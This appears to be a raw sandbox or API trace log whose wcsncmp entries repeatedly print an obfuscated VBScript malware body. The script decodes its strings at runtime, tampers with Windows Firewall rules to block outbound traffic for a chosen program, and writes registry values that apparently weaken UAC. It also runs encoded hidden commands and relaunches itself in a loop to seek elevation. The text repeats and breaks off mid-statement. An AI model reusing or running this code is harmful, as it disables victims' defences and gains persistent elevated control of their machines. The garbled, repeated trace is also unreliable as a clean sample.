bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.996] wcsncmp (_String1="s = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.996] wcsncmp (_String1=" = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.997] wcsncmp (_String1="= policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.997] wcsncmp (_String1=" policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.997] wcsncmp (_String1="policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 